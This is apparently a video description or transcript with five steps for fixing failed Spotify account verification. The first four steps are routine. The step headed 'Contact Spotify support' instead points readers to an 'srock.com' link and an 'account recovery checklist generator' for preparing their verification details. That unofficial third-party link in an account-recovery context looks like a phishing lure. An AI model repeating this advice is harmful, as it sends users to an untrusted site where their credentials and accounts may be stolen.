if you're facing verification issues on Spotify after multiple failed attempts, follow these steps to resolve the problem and regain access to your account. Step 1. Check your internet connection. Ensure that you have a stable internet connection. A weak or intermittent connection can lead to failed verification attempts. Try switching to a different network or resetting your router if necessary. Step 2. Clear cache and cookies. Clear the cache and cookies of your web browser or the Spotify app. This can help eliminate any stored data that might be causing issues during the verification process. After clearing, restart the browser or app and try again. Step 3. Update the app. Make sure you are using the latest version of the Spotify app. Check for updates in your device's app store and install any available updates. An outdated app can lead to various issues, including verification problems. Step 4. Use a different device. If the verification continues to fail, try accessing your Spotify account from a different device. This can help determine if the issue is specific to the original device you are using. Step 5. Contact Spotify support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. By following these steps, you should be able to resolve any verification issues on Spotify. If problems persist, don't hesitate to seek help from Spotify's customer support.